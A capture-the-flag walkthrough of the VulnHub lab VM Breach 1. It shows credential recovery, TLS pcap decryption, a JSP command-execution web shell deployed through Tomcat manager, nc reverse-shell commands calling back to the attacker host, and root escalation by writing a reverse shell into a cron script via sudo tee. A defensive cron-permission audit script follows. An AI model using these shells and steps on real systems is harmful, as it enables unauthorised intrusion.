vulnhub - BREACH: 1
Description
First in a multi-part series, Breach 1.0 is meant to be a beginner-to-intermediate boot2root/CTF challenge. Solving it will require solid information gathering and persistence. Leave no stone unturned.
The VM is configured with a static IP address (192.168.110.140), so you will need to configure your host-only adapter to this subnet.
Many thanks to knightmare and rastamouse for testing and feedback.
Thanks to g0tmi1k for maintaining #vulnhub and hosting my first challenge.
If you run into any problems, you can find me on Twitter: https://twitter.com/mrb3n813 or on IRC in #vulnhub.
Looking forward to the write-ups, especially any unintended local/root paths.
Environment setup
Change the VM's network adapter here to host-only mode; Kali needs the same change.
After a reboot, the corresponding network interface configuration shows up, which means the setup succeeded.
Information gathering - port 80
An nmap port scan shows every port as open, so it is still best to focus on the commonly used ports first.
Visit the web page and view the source:
<!DOCTYPE html>
<html>
<head>
<title>Welcome to Breach 1.0</title>
</head>
<body bgcolor="#000000">
<font color="green">
<p>Initech was breached and the board of directors voted to bring in their internal Initech Cyber Consulting, LLP division to assist. Given the high profile nature of the breach and nearly catastrophic losses, there have been many subsequent attempts against the company. Initech has tasked their TOP consultants, led by Bill Lumbergh, CISSP and Peter Gibbons, C|EH, SEC+, NET+, A+ to contain and perform analysis on the breach.</p>
<p>Little did the company realize that the breach was not the work of skilled hackers, but a parting gift from a disgruntled former employee on his way out. The TOP consultants have been hard at work containing the breach.
However, their own work ethics and the mess left behind may be the company's downfall.</p>
<center><a href="initech.html" target="_blank"> <img src="/images/milton_beach.jpg"
width=500 height=500> </a></center>
<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
</body>
</html>
The comment yields an encoded string; decoding it twice from base64 gives a username and password:
pgibbons:damnitfeel$goodtobeagang$ta
There is also a link pointing to 192.168.110.140/initech.html, whose source contains a comment:
<!--I'm sitting on a beach reading your email! -->
Clicking through to the Employee portal redirects to http://192.168.110.140/impresscms/user.php
Fingerprinting
There is a login form; try logging in with the credentials obtained above.
After logging in, there are three emails.
From ImpressCMS Admin
Posting sensitive content
Peter, yeahhh, I'm going to have to go ahead and ask you to have your team only post any sensitive artifacts to the admin portal. My password is extremely secure. If you could go ahead and tell them all that'd be great. -Bill
From Michael Bolton
IDS/IPS system
Hey Peter,
I got a really good deal on an IDS/IPS system from a vendor I met at that happy hour at Chotchkie's last week!
-Michael
From ImpressCMS Admin
FWD: Thank you for your purchase of Super Secret Cert Pro!
Peter, I am not sure what this is. I saved the file here: 192.168.110.140/.keystore
Bob
----------------------------------------
From: registrar@penetrode.com
Sent: 02 June 2016 16:16
To: bob@initech.com; admin@breach.local
Subject: Thank you for your purchase of Super Secret Cert Pro!
Please find attached your new SSL certificate. Do not share this with anyone!
This email mentions 192.168.110.140/.keystore; together with the SSL certificate mentioned further down, it should be the SSL certificate.
There is nowhere to import and use it yet, though, so try the search box with "SSL":
SSL implementation test capture
Team - I have uploaded a pcap file of our red team's re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out.
http://192.168.110.140/impresscms/_SSL_test_phase1.pcap
They told me the alias, storepassword and keypassword are all set to 'tomcat'. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now?
-Peter
p.s. I'm going fishing for the next 2 days and will not have access to email or phone.
Sure enough, the search finds an email telling us there is a packet capture and that the alias, store password and key password are all set to 'tomcat'.
List the certificates and keys held in the keystore file named "keystore":
keytool -list -keystore keystore
Convert the keystore to PKCS#12 (keytool itself suggests this command; Wireshark's RSA key list can load a PKCS#12 file with its password):
keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12
With the key in the required format, open the packet capture and add the key under
Edit -> Preferences -> Protocols -> TLS -> RSA keys list
by clicking Key file and adding it.
A look through the individual streams turns up a Tomcat manager user definition:
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
That gives one set of credentials. The capture also contains:
Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
Base64-decoding it gives tomcat:Tt\5D8F(#!*u=G)4m7zB, which should be another set of credentials.
There is also a suspicious page, https://192.168.110.140:8443/_M@nag3Me/html, which needs to be visited through an intercepting proxy.
Information gathering - port 8443
Visiting it prompts for a username and password:
tomcat:Tt\5D8F(#!*u=G)4m7zB
Login successful.
Fingerprinting
There is a file upload point that accepts WAR packages.
Package shell.jsp into a WAR:
<%
Runtime.getRuntime().exec(request.getParameter("shell"));
%>
Put shell.jsp alone in a directory and enter that directory at the command line:
jar -cvf Login.war shell.jsp
Access the file at https://192.168.110.140:8443/shell/shell.jsp. A scheduled task deletes files, so go for a reverse shell instead:
nc -v 192.168.110.128 8888 -e /bin/bash
Upgrade to an interactive shell:
python -c 'import pty;pty.spawn("/bin/sh")'
Check /etc/passwd and note these two users:
milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash
Look for suspicious files: under /var/www/5446 there are two PHP files.
Reading them gives the MySQL credentials:
// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );
// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );
Log in directly (the password is empty):
mysql -u root -p
Query the tables.
This gives the password hash of user milton; cracking the MD5 gives the password thelaststraw.
Logging in as milton, though, there is no way to escalate privileges:
$ su milton
su milton
Password: thelaststraw
milton@Breach:/var/www/5446$ sudo -l
sudo -l
[sudo] password for milton: thelaststraw
Sorry, user milton may not run sudo on Breach.
Look around for traces...
Two images have different permissions from the rest; download them to the local machine and examine them with exiftool.
Sure enough, bill.png contains information; after trying it, it turns out to be the password of user blumbergh.
Log in and check the available privilege-escalation routes, and find the relevant escalation command.
Then get a reverse shell again:
echo nc -v 192.168.110.128 7777 -e /bin/bash | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
Note: do not run it yourself right away; doing so makes the escalation fail. Wait for it to be triggered on its own.
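The root cron job behind this last step runs /usr/share/cleanup/tidyup.sh, and the step only works because a non-root user could change that file. As an added example (not part of the write-up), the audit below parses system-crontab lines and reports root-run scripts that non-root users can modify; the crontab text, the fake filesystem and the file modes are constructed, and only the tidyup.sh path comes from the write-up.

```python
import os, re, stat
from typing import Callable, List, Optional, Tuple

# Constructed sample: a system crontab in /etc/crontab style (schedule, user, command)
# plus a fake filesystem standing in for os.stat, mapping path -> (owner uid, st_mode).
# The tidyup.sh path is the one from the write-up; its mode and the other entries are made up.
SAMPLE_CRONTAB = """
SHELL=/bin/sh
# m h dom mon dow user  command
*/3 * * * * root /usr/share/cleanup/tidyup.sh
17 *  * * * root cd / && run-parts --report /etc/cron.hourly
@reboot     milton /home/milton/start.sh
"""
SAMPLE_FS = {
    "/usr/share/cleanup/tidyup.sh": (0, 0o100777),  # root-owned, but anyone may write it
    "/home/milton/start.sh": (1000, 0o100755),      # runs as milton, so not a root exposure
}

CRON_LINE = re.compile(r"^\s*(?:(?:\S+\s+){5}|@\w+\s+)(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
Lookup = Callable[[str], Optional[Tuple[int, int]]]

def real_fs(path: str) -> Optional[Tuple[int, int]]:
    """os.stat-backed lookup used when no fake filesystem is supplied."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, st.st_mode

def audit_crontab(text: str, lookup: Lookup = real_fs) -> List[Tuple[str, str]]:
    """Return (path, reason) for every path a root cron job runs that a non-root user could change."""
    findings = []
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith("#") or m.group("user") != "root":
            continue
        for tok in m.group("cmd").split():
            info = lookup(tok) if tok.startswith("/") else None
            if info is None:
                continue  # not a path, or not present: nothing to assess
            uid, mode = info
            if uid != 0:
                findings.append((tok, f"owned by uid {uid}, not root"))
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((tok, f"writable by group/others (mode {oct(stat.S_IMODE(mode))})"))
    return findings

if __name__ == "__main__":
    for path, reason in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FS.get):
        print(f"root cron job runs {path}: {reason}")
```

In the write-up the write came through sudo /usr/bin/tee rather than loose file permissions, so a permission audit alone would have missed it; the sudoers rule that lets a user write files as root needs the same review.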